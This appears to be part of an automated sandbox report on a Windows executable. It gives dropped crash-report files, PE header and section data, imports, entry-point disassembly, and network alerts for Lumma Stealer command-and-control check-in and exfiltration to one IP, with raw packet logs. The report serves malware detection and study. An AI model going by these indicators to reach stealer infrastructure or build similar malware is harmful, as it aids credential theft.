                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.2.2.2.1.0.5.3.4.0.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.2.2.2.1.5.3.7.7.8.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.a.7.4.7.e.c.-.8.e.a.1.-.4.d.e.0.-.b.3.1.c.-.c.a.d.1.1.7.8.9.7.a.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.1.7.5.4.9.a.-.2.b.7.d.-.4.6.2.c.-.b.4.3.5.-.9.2.e.7.f.3.b.8.1.a.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.U.6.I.v.U.P.N.3.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.9.0.-.0.0.0.1.-.0.0.1.4.-.3.1.4.2.-.b.8.2.d.6.a.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.a.a.8.b.4.1.e.a.6.4.a.a.7.3.9.f.1.a.0.c.e.c.7.1.2.d.5.e.0.0.0.0.0.0.f.f.f.f.!.0.0.0.0.4.d.8.4.b.6.e.0.e.2.9.f.2.4.6.0.9.a.5.e.4.7.e.d.b.2.e.7.5.a.0.5.8.7.1.b.2.e.8.b.!.u.U.6.I.v.U.P.N.3.9...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Thu Jan 9 07:43:41 2025, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):107458
                                                                      Entropy (8bit):2.172513483899008
                                                                      Encrypted:false
                                                                      SSDEEP:768:JGugatTBK7+7Tx+LQxacxMyL7I19OTqgm:Q737+7TxwQxacxTSOTqgm
                                                                      MD5:602BCB710D5769682EC0A0595292C749
                                                                      SHA1:711E9D88A1BEFDD35C9FE643D7440A516040FA4D
                                                                      SHA-256:F9D5E63A38D74AE7EE877D7104B0FABD0C68862762D082240E4E18AF0EC24589
                                                                      SHA-512:EA95B7FC84ECC29C14492128048C0B1B3BA1F66DD784589C0DA7BD5467F58641E1C45163641A88BBA696C4B32DB3E1C15AC28575E404BD25EEDEA4BB9B6BDD6F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:MDMP..a..... .......-~.g........................p...............h$...........N..........`.......8...........T...........pE..R^...........$...........&..............................................................................eJ......p'......GenuineIntel............T...........#~.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8358
                                                                      Entropy (8bit):3.7026109262173064
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJ0jM6MmyT6YSPSU9hgmfGXqESpDG89bytsfNGm:R6lXJOM6CT6YKSU9hgmfGXjAymfV
                                                                      MD5:C13FF5A229186BA017C4215E4B14CC94
                                                                      SHA1:2C684F3953A3BABEBEE7CD890638E68A66B738FD
                                                                      SHA-256:A3E66FC0889444C6C8FEAFEA11CB01595A5B163BEDA827562A49927B76E308A2
                                                                      SHA-512:8474FB0188F6CCED73C166F4DA2417B5A97B58B1032A0F7E7F1CA052C30D0162FFEB17914A128B5BC48880E12EC758FDF2F063C5565047704D18C0490783A046
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.6.0.<./.P.i.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4623
                                                                      Entropy (8bit):4.50042854480038
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsIJg77aI9hmWpW8VYZYm8M4JarPOqFDuP+q8E2ORaAYPNgd:uIjfOI7/n7VdJaLA8i4Ngd
                                                                      MD5:33108E050005BA50DD376FF6B70B6712
                                                                      SHA1:E5011B6C118ADDEE3A8B2985B24E8EA679E6CF05
                                                                      SHA-256:6DA2E4E36710E87355030285BCEA956419B99A348A750EAD851020CEC0748817
                                                                      SHA-512:041D62EA58A57D6500CC0016A2DE7DED16F62DE5C17AAB90224A09F3008A7874D7E97FAE7D528BED35386E011714B2CC2551C822B33A8A9FE2A63286AD29CF3F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.372060403896835
                                                                      Encrypted:false
                                                                      SSDEEP:6144:LFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNViL:xV1QyWWI/glMM6kF77q
                                                                      MD5:985C8CA3FFCCABF77BE6E58A770E483C
                                                                      SHA1:44B92ADFDD3D346DE7E1349B99DC674A045EE3D1
                                                                      SHA-256:93F4BF05AFDC43089D1EB5C0D6714C0B1396C32076C07A487D6413173D7A9240
                                                                      SHA-512:39294609E9B175BDAD27AA2D776A4CE0ECD23C8E8458EC1D9B1C4422FC717B7EE073A4C706C0476899B073D0D507DDAED536E92F558B89C7544FDCD6B98E380C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...3jb..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.548736087075785
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:uU6IvUPN39.exe
                                                                      File size:450'560 bytes
                                                                      MD5:a478b8943ef3239752d731e7290c4a3d
                                                                      SHA1:4d84b6e0e29f24609a5e47edb2e75a05871b2e8b
                                                                      SHA256:3e1364322293b0e928397a936ef70d087273fb886bb910ded4dbc8f7085f8c60
                                                                      SHA512:9fa68831404e3a3709d3c10c20e61f158f4b5375ce8f32753530ec40e57225f8d6075c088b5b1b6265242acd841b460abc71af813d2ed236acdbfa76d3361814
                                                                      SSDEEP:6144:xlYaIX3TE37YfH+LC/XgA06kEvts8Gd/3XyU1rO/dMn4dT6n:/YrAkekXb0l+sd/SXdMn
                                                                      TLSH:30A47C02B6FE3C14FAB767328E2A81E8265FF9F15E74625D2104779F08B2AB1C572741
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A]p. 3#. 3#. 3#.r.#. 3#.r.#. 3#.r.#. 3#..H#. 3#. 2#. 3#.r.#. 3#.r.#. 3#.r.#. 3#Rich. 3#........PE..L......d.................T.
                                                                      Icon Hash:73a733b183a393e4
                                                                      Entrypoint:0x40164d
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x64DDEBDD [Thu Aug 17 09:43:57 2023 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:becaef8603902ffcda8786c9e684de4c
                                                                      Instruction
                                                                      call 00007F7FFCDD399Ah
                                                                      jmp 00007F7FFCDCF53Dh
                                                                      mov edi, edi
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000328h
                                                                      mov dword ptr [0044B8F8h], eax
                                                                      mov dword ptr [0044B8F4h], ecx
                                                                      mov dword ptr [0044B8F0h], edx
                                                                      mov dword ptr [0044B8ECh], ebx
                                                                      mov dword ptr [0044B8E8h], esi
                                                                      mov dword ptr [0044B8E4h], edi
                                                                      mov word ptr [0044B910h], ss
                                                                      mov word ptr [0044B904h], cs
                                                                      mov word ptr [0044B8E0h], ds
                                                                      mov word ptr [0044B8DCh], es
                                                                      mov word ptr [0044B8D8h], fs
                                                                      mov word ptr [0044B8D4h], gs
                                                                      pushfd
                                                                      pop dword ptr [0044B908h]
                                                                      mov eax, dword ptr [ebp+00h]
                                                                      mov dword ptr [0044B8FCh], eax
                                                                      mov eax, dword ptr [ebp+04h]
                                                                      mov dword ptr [0044B900h], eax
                                                                      lea eax, dword ptr [ebp+08h]
                                                                      mov dword ptr [0044B90Ch], eax
                                                                      mov eax, dword ptr [ebp-00000320h]
                                                                      mov dword ptr [0044B848h], 00010001h
                                                                      mov eax, dword ptr [0044B900h]
                                                                      mov dword ptr [0044B7FCh], eax
                                                                      mov dword ptr [0044B7F0h], C0000409h
                                                                      mov dword ptr [0044B7F4h], 00000001h
                                                                      mov eax, dword ptr [0044A004h]
                                                                      mov dword ptr [ebp-00000328h], eax
                                                                      mov eax, dword ptr [0044A008h]
                                                                      mov dword ptr [ebp-00000324h], eax
                                                                      call dword ptr [0000009Ch]
                                                                      Programming Language:
                                                                      • [C++] VS2008 build 21022
                                                                      • [ASM] VS2008 build 21022
                                                                      • [ C ] VS2008 build 21022
                                                                      • [IMP] VS2005 build 50727
                                                                      • [RES] VS2008 build 21022
                                                                      • [LNK] VS2008 build 21022
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x48a1c0x3c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb90000x200e8.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x470000x188.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x4526b0x45400c0b499a76dfbf232479991bbcdf6fa0fFalse0.8047826884025271data7.410598344406821IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x470000x23000x2400c8cdd1133bd5473ff5e715c997e8e9b7False0.3641493055555556data5.478094423685089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x4a0000x67f7c0x18007f6c655df91148d0c3a8a2093876c523False0.3370768229166667data3.3484363118514113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .xidorow0xb20000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .xiko0xb80000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0xb90000x200e80x20200ffd7cc3ca6993211ea0c6e0ee75dfb9aFalse0.3314536721789883data4.398815233964421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_CURSOR0xd06000x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                      RT_CURSOR0xd07480x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                      RT_CURSOR0xd08780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                      RT_CURSOR0xd2e480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                      RT_ICON0xb9b700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                      RT_ICON0xbaa180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4223826714801444
                                                                      RT_ICON0xbb2c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5311059907834101
                                                                      RT_ICON0xbb9880x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.565028901734104
                                                                      RT_ICON0xbbef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.42271784232365145
                                                                      RT_ICON0xbe4980x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.4959016393442623
                                                                      RT_ICON0xbee200x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.500886524822695
                                                                      RT_ICON0xbf2f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.3344882729211087
                                                                      RT_ICON0xc01980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.39666064981949456
                                                                      RT_ICON0xc0a400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.3888248847926267
                                                                      RT_ICON0xc11080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.3959537572254335
                                                                      RT_ICON0xc16700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.22136929460580912
                                                                      RT_ICON0xc3c180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.24765478424015008
                                                                      RT_ICON0xc4cc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.28114754098360656
                                                                      RT_ICON0xc56480x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.3120567375886525
                                                                      RT_ICON0xc5b280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3307569296375267
                                                                      RT_ICON0xc69d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4611913357400722
                                                                      RT_ICON0xc72780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5282258064516129
                                                                      RT_ICON0xc79400x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                      RT_ICON0xc7ea80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.3025328330206379
                                                                      RT_ICON0xc8f500x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.3008196721311475
                                                                      RT_ICON0xc98d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3528368794326241
                                                                      RT_ICON0xc9da80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.28171641791044777
                                                                      RT_ICON0xcac500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36597472924187724
                                                                      RT_ICON0xcb4f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3738479262672811
                                                                      RT_ICON0xcbbc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                                      RT_ICON0xcc1280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2598547717842324
                                                                      RT_ICON0xce6d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.27790806754221387
                                                                      RT_ICON0xcf7780x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28524590163934427
                                                                      RT_ICON0xd01000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.32358156028368795
                                                                      RT_STRING0xd3eb80x4c4data0.44344262295081965
                                                                      RT_STRING0xd43800x15edata0.5114285714285715
                                                                      RT_STRING0xd44e00x7d4data0.4241516966067864
                                                                      RT_STRING0xd4cb80x7b0data0.42327235772357724
                                                                      RT_STRING0xd54680x5f8data0.4443717277486911
                                                                      RT_STRING0xd5a600x6b6data0.43364377182770664
                                                                      RT_STRING0xd61180x66adata0.438489646772229
                                                                      RT_STRING0xd67880x6fadata0.4316909294512878
                                                                      RT_STRING0xd6e880x754data0.4253731343283582
                                                                      RT_STRING0xd75e00x422data0.4735349716446125
                                                                      RT_STRING0xd7a080x668data0.4329268292682927
                                                                      RT_STRING0xd80700x80edata0.4146459747817653
                                                                      RT_STRING0xd88800x668data0.4274390243902439
                                                                      RT_STRING0xd8ee80x1fedata0.49411764705882355
                                                                      RT_ACCELERATOR0xd05e00x20data1.15625
                                                                      RT_GROUP_CURSOR0xd07300x14data1.15
                                                                      RT_GROUP_CURSOR0xd2e200x22data1.0588235294117647
                                                                      RT_GROUP_CURSOR0xd3cf00x14data1.25
                                                                      RT_GROUP_ICON0xbf2880x68data0.7115384615384616
                                                                      RT_GROUP_ICON0xd05680x76data0.6779661016949152
                                                                      RT_GROUP_ICON0xc5ab00x76data0.6779661016949152
                                                                      RT_GROUP_ICON0xc9d400x68data0.7211538461538461
                                                                      RT_VERSION0xd3d080x1b0data0.5833333333333334
                                                                      DLLImport
                                                                      KERNEL32.dllGetThreadContext, GetNumaNodeProcessorMask, SetDefaultCommConfigA, DebugActiveProcessStop, CreateProcessW, InterlockedIncrement, GetEnvironmentStringsW, CancelWaitableTimer, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetModuleHandleW, GetCurrentThread, GetDateFormatA, SetProcessPriorityBoost, GetVolumePathNameW, LoadLibraryW, GetConsoleAliasW, GetStartupInfoW, GetShortPathNameA, GetStartupInfoA, SetLastError, GetProcAddress, SearchPathA, GetAtomNameA, UnhandledExceptionFilter, LocalAlloc, DeleteTimerQueue, AddAtomA, FindAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeW, GetModuleHandleA, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetLastError, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, RaiseException
                                                                      USER32.dllGetProcessDefaultLayout
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-01-09T08:43:35.571305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.96.1443TCP
                                                                      2025-01-09T08:43:36.028845+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706104.21.96.1443TCP
                                                                      2025-01-09T08:43:36.028845+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.96.1443TCP
                                                                      2025-01-09T08:43:36.562488+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.96.1443TCP
                                                                      2025-01-09T08:43:37.320591+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849707104.21.96.1443TCP
                                                                      2025-01-09T08:43:37.320591+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707104.21.96.1443TCP
                                                                      2025-01-09T08:43:38.043716+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.96.1443TCP
                                                                      2025-01-09T08:43:38.622693+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849708104.21.96.1443TCP
                                                                      2025-01-09T08:43:39.209528+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.21.96.1443TCP
                                                                      2025-01-09T08:43:40.747263+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710104.21.96.1443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 9, 2025 08:43:35.078191996 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.078258991 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:35.078358889 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.081181049 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.081192017 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:35.571063042 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:35.571305037 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.573688030 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.573694944 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:35.573991060 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:35.614183903 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.623723984 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.623753071 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:35.623888969 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.028856039 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.028968096 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.029062986 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.059966087 CET49706443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.059988022 CET44349706104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.072056055 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.072098970 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.072165012 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.072444916 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.072457075 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.562427044 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.562488079 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.580547094 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.580563068 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.580833912 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:36.595438957 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.595474958 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:36.595510006 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320597887 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320660114 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320693016 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320727110 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320784092 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320796967 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.320806980 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320833921 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.320852995 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320854902 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.320863008 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.320899963 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.321393013 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.325258970 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.325299978 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.325313091 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.325328112 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.325373888 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.411098003 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.411186934 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.411216974 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.411231041 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.411254883 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.411297083 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.411303043 CET44349707104.21.96.1192.168.2.8
